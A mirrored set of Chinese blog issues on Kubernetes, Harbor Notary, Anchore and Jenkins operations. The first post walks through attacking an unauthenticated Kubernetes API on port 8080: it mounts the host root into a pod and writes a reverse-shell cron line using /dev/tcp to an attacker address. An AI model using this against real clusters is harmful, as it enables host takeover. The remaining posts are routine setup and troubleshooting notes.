Giter VIP home page Giter VIP logo

blog's People

Contributors

zj1244 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

blog's Issues

通过kubectl攻击存在未授权访问漏洞的Kubernetes

漏洞的起因是因为8080端口未进行限制或者关闭
根据官方文档,API Server 默认会开启两个端口:8080 和 6443。其中 8080 端口无需认证,应该仅用于测试。6443 端口需要认证,且有 TLS 保护。

直接访问 8080 端口会返回可用的 API 列表,如:
image
而对于端口指纹,则如下:
image

如果Kubernetes API Server配置了Dashboard,通过路径/ui即可访问:
image

但是测试的这一台并没有配置dashboard,所以不能通过图形界面来创建容器,只能通过kubectl(kubectl是官方提供了一个命令行工具 )来进行操作。kubectl安装过程如下:

cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
EOF
yum install -y kubectl

尝试获取目标机器的信息:
image

需要注意到是如果如果客户端版本比服务器的高,会出现如下错误,需要把kubectl的版本降低
image

下面把kubectl版本降到1.8.7:

curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.8.7/bin/linux/amd64/kubectl
chmod 777 kubectl
mv /usr/bin/kubectl /usr/bin/kubectl.bak
mv kubectl /usr/bin/kubectl

查看版本降成了1.8.7,执行命令成功
image

接着在本机上新建个yaml文件用于创建容器,并将节点的根目录挂载到容器的 /mnt 目录,内容如下:

apiVersion: v1
kind: Pod
metadata:
  name: myapp
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

然后使用 kubectl 创建容器:

// 由 myapp.yaml 创建容器,并使用定时任务反弹shell
> kubectl -s 1.2.3.4:8080 create -f myapp.yaml
// 等待容器创建完成
// 获得 myapp 的交互式 shell
> kubectl -s 1.2.3.4:8080 --namespace=default exec -it myapp bash
// 向 crontab 写入反弹 shell 的定时任务
> echo -e "* * * * * root bash -i >& /dev/tcp/x.x.x.x/8888 0>&1\n" >> /mnt/etc/crontab

image
image

参考链接:
https://0x0d.im/archives/attack-container-management-platform.html

harbor的Notary功能测试

条件:

  • 客户端登陆docker login xxxxxx

  • /etc/hosts添加相应的域名IP解析

  1. 开启notary后,docker客户端分别拉取两个镜像:一个签名后,一个未签名。结果是未签名的拉取报错:
    image

场景一:
在开启DOCKER_CONTENT_TRUST=1的机器上,有证书,入侵者把恶意镜像替换为已签名的镜像,并把镜像push到仓库里,如下图:
image
结论:虽然有证书,但是push的时候还是需要输入仓库密码

场景二:
在开启DOCKER_CONTENT_TRUST=0的机器上,没有证书,入侵者把恶意镜像替换为已签名的镜像,并把镜像push到仓库里,如下图:
image
image
image

结论:可以看到虽然DOCKER_CONTENT_TRUST=0的情况下,不用输入密码就可以push成功,但是签名标识变成了×。

再看看拉取时候的情况:
image

plugin flannel does not support config version的错误

报错

在master上看node发现NotReady,接着去问题node查看日志【journalctl -f -u kubelet】,提示
image

原因

从网上查到,应该是/etc/cni/net.d/10-flannel.conf文件里少了cniVersion版本,加上就可以解决。

[root@security ops]# cat /etc/cni/net.d/10-flannel.conf
{
  "name": "cbr0",
"cniVersion": "0.2.0",
  "type": "flannel",
  "delegate": {
    "isDefaultGateway": true
  }
}
[root@security ops]# systemctl daemon-reload

使用docker-compose部署Anchore Engine

1、命令如下:

# curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml
# docker-compose up -d

2、查看部署是否成功:

# docker-compose ps
        Name                      Command               State           Ports         
--------------------------------------------------------------------------------------
root_analyzer_1        /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_api_1             /docker-entrypoint.sh anch ...   Up      0.0.0.0:8228->8228/tcp
root_catalog_1         /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_db_1              docker-entrypoint.sh postgres    Up      5432/tcp              
root_policy-engine_1   /docker-entrypoint.sh anch ...   Up      8228/tcp              
root_queue_1           /docker-entrypoint.sh anch ...   Up      8228/tcp     
# docker-compose exec api anchore-cli system status
Service analyzer (anchore-quickstart, http://analyzer:8228): up
Service simplequeue (anchore-quickstart, http://queue:8228): up
Service apiext (anchore-quickstart, http://api:8228): up
Service policy_engine (anchore-quickstart, http://policy-engine:8228): up
Service catalog (anchore-quickstart, http://catalog:8228): up

Engine DB Version: 0.0.13
Engine Code Version: 0.7.1

3、等待漏洞库更新完毕

# docker-compose exec api anchore-cli system wait
Starting checks to wait for anchore-engine to be available timeout=-1.0 interval=5.0
API availability: Checking anchore-engine URL (http://localhost:8228)...
API availability: Success.
Service availability: Checking for service set (catalog,apiext,policy_engine,simplequeue,analyzer)...
Service availability: Success.
Feed sync: Checking sync completion for feed set (vulnerabilities)...
Feed sync: Checking sync completion for feed set (vulnerabilities)...
...
...
Feed sync: Success.

参考:
https://docs.anchore.com/current/docs/engine/quickstart/

jenkins使用Publish over ssh实现远程部署

1.新建job

新建个自由风格的任务,任务名为test
image

2. 安装Gogs插件

打开 系统管理 -> 管理插件 -> 可选插件,在右上角输入框中输入"gogs"来筛选插件
image

3. 添加web钩子

进入仓库,这里使用的是gogs。然后点击【仓库设置】->【管理Web钩子】->【添加Web钩子】-> 【Gogs】
image

4. 设置web钩子

需要注意的是job=test中的test是jenkins里的任务名,需要一一对应,不能填错。
image

5. 安装Publish over ssh插件

image

6. 设置Publish over ssh

【系统管理】【系统配置】中找到【Publish over SSH】,配置远程服务器的ip、登录用户名和密码
Remote Directory输入/home/ci,表示远程工作目录是/home/ci,之后传输的文件都将放于此。
image

7. 任务设置

在jenkins任务中的【源码管理】里选择Git,输入仓库url和仓库登陆密码:
image

接着选择【构建后操作】【send build artifacts over ssh】

  • Source files:需要复制的源文件,**/*表示所有文件以及文件夹
  • Remote directory:表示复制到哪个文件夹,这里如果写test,那么会和第二步的【/home/ci】合并起来,表示最后要把文件复制到【/home/ci/test】文件夹里,远程机器没有test文件夹会自动创建
  • Exec command:复制完成后,在远程机器上执行的命令,这里加sudo是因为不加会有权限问题。这里写【sudo cp -r test/* /www/threat/】表示把/home/ci/test里的所有文件复制到网站主目录下,这样就实现了远程部署
    image

anchore添加扫描策略

常用命令

  • 查看policy情况
#  anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy list
  • 激活策略,需要激活才能在jenkins上体现出来
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy activate policy-check-env
  • 导出策略
# anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy get 2c53a13c-1765-11e8-82ef-23527761d060 --detail > policybundle.json
  • 执行策略扫描
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  evaluate check zj1244/demo:10 --policy policy-check-env --detail
  • 添加策略
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy add anchore_policy.json
  • 删除策略
# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy del policy-check-env

扫描dockerfile里是否存在敏感信息

添加一个策略

来添加一个最简单的策略,作用是查找dockerfile里是否存在password环境变量:

{
    "blacklisted_images": [],
    "comment": "Default bundle",
    "id": "policy-check-env",
    "mappings": [
        {
            "image": {
                "type": "tag",
                "value": "*"
            },
            "name": "default",
            "policy_id": "policy_1",
            "registry": "*",
            "repository": "*",
            "whitelist_ids": [
            ]
        }
    ],
    "name": "Critical Security Policy",
    "policies": [
        {
            "comment": "Critical vulnerability,  secrets, and best practice violations",
            "id": "policy_1",
            "name": "default",
            "rules": [
                
		{
                    "action": "STOP",
                    "gate": "dockerfile",
                    "id": "test_1",
                    "params": [
		    {
			      "name": "instruction", 
			      "value": "ENV" //触发哪个指令
			}, 
			{
			"name": "check",
			"value": "like"
			},
			{
			"name": "value",
			"value": ".*PASS.*"
			}
                    ],
                    "trigger": "instruction" //使用哪种触发器
                }

                
            ],
            "version": "1_0"
        }
    ],
    "version": "1_0",
    "whitelisted_images": [],
    "whitelists": [
        
    ]
}

添加策略

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy add anchore_policy.json
Policy ID: policy-check-env
Active: False
Source: local
Created: 2020-03-30T07:58:32Z
Updated: 2020-03-30T07:58:32Z

激活策略

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  policy activate policy-check-env
Success: policy-check-env activated

执行扫描

# anchore-cli  --u admin --p 123 --url http://192.168.47.123:31050/v1  evaluate check zj1244/demo:10 --policy policy-check-env --detail
Image Digest: sha256:dc083990823a30faa6d5f8b425f9fb52bca4341e7f12d2f9f59773dce9cd04ad
Full Tag: docker.io/zj1244/demo:10
Image ID: 780c008ae27248223c23a7e2e3259915fa97adc6c052489d0ff96999e466b21e
Status: fail
Last Eval: 2020-03-30T08:01:50Z
Policy ID: policy-check-env
Final Action: stop
Final Action Reason: policy_evaluation

Gate              Trigger            Detail                                                                                               Status        
dockerfile        instruction        Dockerfile directive 'ENV' check 'like' matched against '.*PASS.*' for line 'PASSWORD 123456'        stop          

jenkins构建

当jenkins构建的时候,可以看到策略也生效
image

添加白名单

直接给出json文件:

{
    "blacklisted_images": [], 
    "comment": "Default bundle", 
    "id": "2c53a13c-1765-11e8-82ef-23527761d060", 
    "mappings": [
        {
            "id": "c4f9bf74-dc38-4ddf-b5cf-00e9c0074611", 
            "image": {
                "type": "tag", 
                "value": "*"
            }, 
            "name": "default", 
            "policy_id": "48e6f7d6-1765-11e8-b5f9-8b6f228548b6", 
            "registry": "*", 
            "repository": "*", 
            "whitelist_ids": [
                "37fd763e-1765-11e8-add4-3b16c029ac5c"  //和下面白名单的id对应
            ]
        }
    ], 
    "name": "Default bundle", 
    "policies": [
        {
            "comment": "System default policy", 
            "id": "48e6f7d6-1765-11e8-b5f9-8b6f228548b6", 
            "name": "DefaultPolicy", 
            "rules": [
                {
                    "action": "STOP", 
                    "gate": "dockerfile", 
                    "id": "ce7b8000-829b-4c27-8122-69cd59018400", 
                    "params": [
                        {
                            "name": "ports", 
                            "value": "22"
                        }, 
                        {
                            "name": "type", 
                            "value": "blacklist"
                        }
                    ], 
                    "trigger": "exposed_ports"
                }, 
                {
                    "action": "WARN", 
                    "gate": "dockerfile", 
                    "id": "312d9e41-1c05-4e2f-ad89-b7d34b0855bb", 
                    "params": [
                        {
                            "name": "instruction", 
                            "value": "HEALTHCHECK"
                        }, 
                        {
                            "name": "check", 
                            "value": "not_exists"
                        }
                    ], 
                    "trigger": "instruction"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "6b5c14e7-a6f7-48cc-99d2-959273a2c6fa", 
                    "params": [
                        {
                            "name": "max_days_since_sync", 
                            "value": "2"
                        }
                    ], 
                    "trigger": "stale_feed_data"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "3e79ea94-18c4-4d26-9e29-3b9172a62c2e", 
                    "params": [], 
                    "trigger": "vulnerability_data_unavailable"
                }, 
                {
                    "action": "WARN", 
                    "gate": "vulnerabilities", 
                    "id": "6063fdde-b1c5-46af-973a-915739451ac4", 
                    "params": [
                        {
                            "name": "package_type", 
                            "value": "all"
                        }, 
                        {
                            "name": "severity_comparison", 
                            "value": "="
                        }, 
                        {
                            "name": "severity", 
                            "value": "medium"
                        }
                    ], 
                    "trigger": "package"
                }, 
                {
                    "action": "STOP", 
                    "gate": "vulnerabilities", 
                    "id": "b30e8abc-444f-45b1-8a37-55be1b8c8bb5", 
                    "params": [
                        {
                            "name": "package_type", 
                            "value": "all"
                        }, 
                        {
                            "name": "severity_comparison", 
                            "value": ">"
                        }, 
                        {
                            "name": "severity", 
                            "value": "medium"
                        }
                    ], 
                    "trigger": "package"
                }
            ], 
            "version": "1_0"
        }
    ], 
    "version": "1_0", 
    "whitelisted_images": [], 
    "whitelists": [
        {
            "comment": "Default global whitelist", 
            "id": "37fd763e-1765-11e8-add4-3b16c029ac5c", 
            "items": [

{
        "gate": "vulnerabilities",
        "trigger_id": "CVE-2018-11236+*",
        "id": "rule2"
      }
		], 
            "name": "Global Whitelist", 
            "version": "1_0"
        }
    ]
}

trigger_id支持正则,里面的内容可以通过jenkins里的报告查出来
image

参考:
https://docs.anchore.com/current/docs/engine/usage/cli_usage/policies/policy_gate_dockerfile/#trigger-instruction
https://mydeveloperplanet.com/2019/02/27/anchore-container-image-scanner-jenkins-plugin/
https://docs.anchore.com/current/docs/overview/concepts/policy/policy_checks/#introduction
https://anchore.com/using-anchore-to-identify-secrets-in-container-images/
https://anchore.com/enforcing-alpine-linux-docker-images-vulnerability-cve-2019-5021-with-anchore/

https://github.com/cloudbees-days/anchore-scan/blob/master/.anchore_policy.json

k8s因flannel网络报错的问题

  • 背景
    使用kubeadm reset重置node后,在kubeadm join加入集群,创建pod的时候,发现如下错误:
Failed create pod sandbox: rpc error: code = Unknown desc = failed to set up sandbox container "6b3b6f0758f193395f3bda06e64c583ac9c5ff965a888f9afdc867bad952b01a" network for pod "anchore-anchore-engine-analyzer-5958bf997c-2ngs8": NetworkPlugin cni failed to set up pod "anchore-anchore-ee addr: "cni0" already has an IP address different from 10.244.3.1/24

image

  • 解决方法
    这些问题的原因是flannel 网络问题,最直接的方法就是把node重新reset,方法如下:
[root@sec-infoanalysis1-test aevolume]# kubeadm reset
[reset] WARNING: Changes made to this host by 'kubeadm init' or 'kubeadm join' will be reverted.
[reset] Are you sure you want to proceed? [y/N]: y
[preflight] Running pre-flight checks
W1025 10:16:01.329478     393 removeetcdmember.go:79] [reset] No kubeadm config, using etcd pod spec to get data directory
[reset] No etcd config found. Assuming external etcd
[reset] Please, manually reset etcd to prevent further issues
[reset] Stopping the kubelet service
[reset] Unmounting mounted directories in "/var/lib/kubelet"
[reset] Deleting contents of config directories: [/etc/kubernetes/manifests /etc/kubernetes/pki]
[reset] Deleting files: [/etc/kubernetes/admin.conf /etc/kubernetes/kubelet.conf /etc/kubernetes/bootstrap-kubelet.conf /etc/kubernetes/controller-manager.conf /etc/kubernetes/scheduler.conf]
[reset] Deleting contents of stateful directories: [/var/lib/kubelet /etc/cni/net.d /var/lib/dockershim /var/run/kubernetes]

The reset process does not reset or clean up iptables rules or IPVS tables.
If you wish to reset iptables, you must do so manually.
For example:
iptables -F && iptables -t nat -F && iptables -t mangle -F && iptables -X

If your cluster was setup to utilize IPVS, run ipvsadm --clear (or similar)
to reset your system's IPVS tables.

The reset process does not clean your kubeconfig files and you must remove them manually.
Please, check the contents of the $HOME/.kube/config file.
[root@sec-infoanalysis1-test aevolume]# ifconfig  cni0 down
[root@sec-infoanalysis1-test aevolume]# yum install bridge-utils
[root@sec-infoanalysis1-test aevolume]# brctl delbr cni0
[root@sec-infoanalysis1-test aevolume]# ip link delete flannel.1
[root@sec-infoanalysis1-test aevolume]# kubeadm join --token=6nq2co.yjttt4y6udrraq3s 192.168.47.146:6443 --discovery-token-unsafe-skip-ca-verification

k8s命令

任何命令如果不加-n xxx/--namespace xxx都会默认在default

查看namespaces:

[root@localhost resource-manifests]# kubectl get namespaces
NAME              STATUS   AGE
default           Active   4h11m
kube-node-lease   Active   4h11m
kube-public       Active   4h11m
kube-system       Active   4h11m

升级deployment

升级deployment有两种方式,一种是直接修改,一种是修改yaml文件:
第一种:

[root@localhost resource-manifests]# kubectl get deployments
NAME          READY   UP-TO-DATE   AVAILABLE   AGE
sa-frontend   2/2     2            2           3h34m
[root@localhost resource-manifests]# kubectl edit deployment sa-frontend
Edit cancelled, no changes made.
[root@localhost resource-manifests]# kubectl edit deployment/sa-frontend
Edit cancelled, no changes made.
[root@localhost resource-manifests]# kubectl edit deployment.extensions/sa-frontend
Edit cancelled, no changes made.

第二种:

[root@localhost resource-manifests]# cat sa-frontend-deployment-green.yaml 
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: sa-frontend
spec:
  replicas: 2
  minReadySeconds: 15
  strategy:
    type: RollingUpdate
    rollingUpdate: 
      maxUnavailable: 1
      maxSurge: 1
  template:
    metadata:
      labels:
        app: sa-frontend
    spec:
      containers:
        - image: rinormaloku/sentiment-analysis-frontend:green
          imagePullPolicy: Always
          name: sa-frontend
          ports:
            - containerPort: 80[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl apply -f sa-frontend-deployment-green.yaml --record //升级要用apply,用create会因为重名而报错
deployment.extensions/sa-frontend configured
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl rollout status deployment sa-frontend //查看升级过程
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 old replicas are pending termination...
Waiting for deployment "sa-frontend" rollout to finish: 1 of 2 updated replicas are available...
deployment "sa-frontend" successfully rolled out
[root@localhost resource-manifests]# 

回退上一个版本

[root@localhost resource-manifests]# kubectl rollout history deployment sa-frontend //查看deployment版本
deployment.extensions/sa-frontend 
REVISION  CHANGE-CAUSE
1         <none>         <------1是版本
2         kubectl apply --filename=sa-frontend-deployment-green.yaml --record=true

[root@localhost resource-manifests]# kubectl rollout undo deployment sa-frontend --to-revision=1 //回退到上一个版本
deployment.extensions/sa-frontend rolled back
[root@localhost resource-manifests]# kubectl get pods -o wide --all-namespaces
NAME                           READY   STATUS    RESTARTS   AGE   IP            NODE        NOMINATED NODE   READINESS GATES
sa-frontend-66bd785c7f-mhjtc   1/1     Running   0          21m   10.100.0.13   localhost   <none>           <none>
sa-frontend-66bd785c7f-qwhzf   1/1     Running   0          21m   10.100.0.14   localhost   <none>           <none>
sa-logic-798b555684-c6r8b      1/1     Running   0          15m   10.100.0.15   localhost   <none>           <none>
sa-logic-798b555684-wb26v      1/1     Running   0          15m   10.100.0.16   localhost   <none>           <none>
[root@localhost resource-manifests]# 
[root@localhost resource-manifests]# kubectl get svc //查看服务
NAME                   TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)        AGE
kubernetes             ClusterIP   10.96.0.1        <none>        443/TCP        4h37m
sa-frontend-nodeport   NodePort    10.111.36.213    <none>        80:31068/TCP   78m
sa-logic               ClusterIP   10.110.167.111   <none>        80/TCP         3m27s
[root@localhost resource-manifests]# kubectl describe service sa-frontend-nodeport //查看服务详细信息
Name:                     sa-frontend-nodeport
Namespace:                default
Labels:                   <none>
Annotations:              <none>
Selector:                 app=sa-frontend
Type:                     NodePort //Service 通过 Cluster 节点的静态端口对外提供服务。Cluster 外部可以通过 <NodeIP>:<NodePort> 访问 Service
IP:                       10.111.36.213
Port:                     <unset>  80/TCP //ClusterIP 上监听的端口,只能Cluster 内部访问
TargetPort:               80/TCP //pod监听的端口,也就是pod里会有个程序监听此端口,用于提供某种服务
NodePort:                 <unset>  31068/TCP //节点上监听的端口,也就是对外提供服务的端口。默认随机分配,可指定
Endpoints:                10.100.0.13:80,10.100.0.14:80 // 也可以通过 Cluster 内部的 IP 访问
Session Affinity:         None
External Traffic Policy:  Cluster
Events:                   <none>

也就是访问本机有效IP:NodePort或者访问pod_ip:Port都会转发到TargetPort。
image

查看pod详情

当pod没起来的时候,查看详情:

[root@sec-infoanalysis2-test ops]# kubectl describe pod billowing-kudu-hello-helm-5c6689fcf9-qjhbp
Name:           billowing-kudu-hello-helm-5c6689fcf9-qjhbp
Namespace:      default
Priority:       0
Node:           sec-k8s-node1/192.168.47.144
Start Time:     Mon, 21 Oct 2019 15:55:16 +0800
Labels:         app.kubernetes.io/instance=billowing-kudu
                app.kubernetes.io/name=hello-helm
                pod-template-hash=5c6689fcf9
Annotations:    <none>
Status:         Running
IP:             10.244.2.27
Controlled By:  ReplicaSet/billowing-kudu-hello-helm-5c6689fcf9
Containers:
  hello-helm:
    Container ID:   docker://68fdb85c3f78da1c034b17b8f1fd1203c7883b785cb98bc5165f37d157544af2
    Image:          nginx:stable
    Image ID:       docker-pullable://nginx@sha256:dd87b3bba63ff0cf6545fca46c9cdecb3e2ab09cacdbc1a08c1000ab97c76b75
    Port:           80/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Mon, 21 Oct 2019 16:03:04 +0800
    Ready:          True
    Restart Count:  0
    Liveness:       http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Readiness:      http-get http://:http/ delay=0s timeout=1s period=10s #success=1 #failure=3
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-m4s9k (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             True 
  ContainersReady   True 
  PodScheduled      True 
Volumes:
  default-token-m4s9k:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-m4s9k
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:
  Type    Reason     Age    From                    Message
  ----    ------     ----   ----                    -------
  Normal  Scheduled  16m    default-scheduler       Successfully assigned default/billowing-kudu-hello-helm-5c6689fcf9-qjhbp to sec-k8s-node1
  Normal  Pulling    16m    kubelet, sec-k8s-node1  Pulling image "nginx:stable"
  Normal  Pulled     8m42s  kubelet, sec-k8s-node1  Successfully pulled image "nginx:stable"
  Normal  Created    8m41s  kubelet, sec-k8s-node1  Created container hello-helm
  Normal  Started    8m41s  kubelet, sec-k8s-node1  Started container hello-helm

设置node的role标签

[root@infoanalysis2-test ops]# kubectl get nodes
NAME                     STATUS   ROLES    AGE   VERSION
infoanalysis1-test   Ready    node     78d   v1.15.1
infoanalysis2-test   Ready    master   78d   v1.15.1
k8s-node1            Ready    <none>   20s   v1.15.1
[root@infoanalysis2-test ops]# kubectl label nodes k8s-node1 node-role.kubernetes.io/node=
node/k8s-node1 labeled
[root@infoanalysis2-test ops]# kubectl get nodes
NAME                     STATUS   ROLES    AGE   VERSION
infoanalysis1-test   Ready    node     78d   v1.15.1
infoanalysis2-test   Ready    master   78d   v1.15.1
k8s-node1            Ready    node     2m    v1.15.1

k8s上部署jenkins

安装nfs服务

yum install -y nfs-utils

设置nfs目录

# cat /etc/exports
/data/     *(rw,sync,no_root_squash,no_all_squash)

nfs-client-deployment.yaml

#ServiceAccount
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: nfs-client-provisioner
#rbac
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: nfs-client-provisioner-runner
rules:
  - apiGroups: [""]
    resources: ["persistentvolumes"]
    verbs: ["get", "list", "watch", "create", "delete"]
  - apiGroups: [""]
    resources: ["persistentvolumeclaims"]
    verbs: ["get", "list", "watch", "update"]
  - apiGroups: ["storage.k8s.io"]
    resources: ["storageclasses"]
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["events"]
    verbs: ["list", "watch", "create", "update", "patch"]
  - apiGroups: [""]
    resources: ["endpoints"]
    verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]

---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: run-nfs-client-provisioner
subjects:
  - kind: ServiceAccount
    name: nfs-client-provisioner
    namespace: default
roleRef:
  kind: ClusterRole
  name: nfs-client-provisioner-runner
  apiGroup: rbac.authorization.k8s.io
#deployment
---
kind: Deployment
apiVersion: extensions/v1beta1
metadata:
  name: nfs-client-provisioner
spec:
  replicas: 1
  strategy:
    type: Recreate
  template:
    metadata:
      labels:
        app: nfs-client-provisioner
    spec:
      serviceAccountName: nfs-client-provisioner
      containers:
        - name: nfs-client-provisioner
          # image: quay.io/external_storage/nfs-client-provisioner:latest
          image: registry.cn-hangzhou.aliyuncs.com/open-ali/nfs-client-provisioner:latest
          volumeMounts:
            - name: nfs-client-root
              mountPath: /persistentvolumes
          env:
            - name: PROVISIONER_NAME
              value: fuseim.pri/ifs
            - name: NFS_SERVER
              value: 192.168.1.68
            - name: NFS_PATH
              value: /data
      volumes:
        - name: nfs-client-root
          nfs:
            server: 192.168.1.68
            path: /data

nfs-client-class.yaml

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: nfs-storage
provisioner: fuseim.pri/ifs # or choose another name, must match deployment's env PROVISIONER_NAME'

jenkins-rbac.yaml

# In GKE need to get RBAC permissions first with
# kubectl create clusterrolebinding cluster-admin-binding --clusterrole=cluster-admin [--user=<user-name>|--group=<group-name>]

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jenkins

---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
  name: jenkins
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["create","delete","get","list","patch","update","watch"]
- apiGroups: [""]
  resources: ["pods/exec"]
  verbs: ["create","delete","get","list","patch","update","watch"]
- apiGroups: [""]
  resources: ["pods/log"]
  verbs: ["get","list","watch"]
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: jenkins
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: jenkins
subjects:
- kind: ServiceAccount
  name: jenkins

jenkins-pvc.yaml

kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: jenkins-home
  annotations:
    volume.beta.kubernetes.io/storage-class: "nfs-storage"
spec:
  accessModes:
  - ReadWriteMany
  resources:
    requests:
      storage: 50G

jenkins-statefulset.yaml

# StatefulSet
---
apiVersion: apps/v1beta1
kind: StatefulSet
metadata:
  name: jenkins
  labels:
    name: jenkins
spec:
  serviceName: jenkins
  replicas: 1
  updateStrategy:
    type: RollingUpdate
  template:
    metadata:
      name: jenkins
      labels:
        name: jenkins
    spec:
      terminationGracePeriodSeconds: 10
      serviceAccountName: jenkins
      containers:
        - name: jenkins
          image: jenkins/jenkins:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
              name: web
              protocol: TCP
            - containerPort: 50000
              name: agent
              protocol: TCP
          resources:
            limits:
              cpu: 1
              memory: 1Gi
            requests:
              cpu: 0.5
              memory: 500Mi
          env:
            - name: LIMITS_MEMORY
              valueFrom:
                resourceFieldRef:
                  resource: limits.memory
                  divisor: 1Mi
            - name: JAVA_OPTS
              # value: -XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap -XX:MaxRAMFraction=1 -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
              value: -Duser.timezone=Asia/Shanghai -Xmx$(LIMITS_MEMORY)m -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
          volumeMounts:
            - name: jenkins-home
              mountPath: /var/jenkins_home
          livenessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
          readinessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
      volumes:
      - name: jenkins-home
        persistentVolumeClaim:
          claimName: jenkins-home
      securityContext:
        fsGroup: 1000

jenkins-svc.yaml

---
apiVersion: v1
kind: Service
metadata:
  name: jenkins
spec:
  type: NodePort
  selector:
    name: jenkins
  ports:
  - name: web
    port: 8080
    targetPort: web
  - name: agent
    port: 50000
    targetPort: agent

运行所有yaml

kubectl create -f nfs-client-deployment.yaml
kubectl create -f nfs-client-class.yaml
kubectl create -f jenkins-rbac.yaml
kubectl create -f jenkins-pvc.yaml
kubectl create -f jenkins-statefulset.yaml
kubectl create -f jenkins-svc.yaml

访问jenkins

使用浏览器访问jenkinshttp://192.168.1.68:31669/,通过查看日志获取密码登录

# kubectl get svc|grep jenkins
jenkins      NodePort    10.100.221.153   <none>        8080:31669/TCP,50000:31011/TCP  

在jenkins上运行docker

使用了Docker-in-Docker,原理就是把宿主机的docker.sock映射到pod里,需要注意的是镜像里要添加docker客户端,这里用的是zj1244/jenkins_with_docker:v1

Dockerfile文件内容:

FROM jenkins/jenkins:latest
MAINTAINER [email protected]
USER root

# Install the latest Docker CE binaries
RUN apt-get update && \
    apt-get -y install apt-transport-https \
      ca-certificates \
      curl \
      gnupg2 \
      software-properties-common && \
    curl -fsSL https://download.docker.com/linux/$(. /etc/os-release; echo "$ID")/gpg > /tmp/dkey; apt-key add /tmp/dkey && \
    add-apt-repository \
      "deb [arch=amd64] https://download.docker.com/linux/$(. /etc/os-release; echo "$ID") \
      $(lsb_release -cs) \
      stable" && \
   apt-get update && \
   apt-get -y install docker-ce

我们在jenkins-statefulset.yaml里添加文件映射:

# StatefulSet
---
apiVersion: apps/v1beta1
kind: StatefulSet
metadata:
  name: jenkins
  labels:
    name: jenkins
spec:
  serviceName: jenkins
  replicas: 1
  updateStrategy:
    type: RollingUpdate
  template:
    metadata:
      name: jenkins
      labels:
        name: jenkins
    spec:
      terminationGracePeriodSeconds: 10
      serviceAccountName: jenkins
      containers:
        - name: jenkins
          image: zj1244/jenkins_with_docker:v1
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
              name: web
              protocol: TCP
            - containerPort: 50000
              name: agent
              protocol: TCP
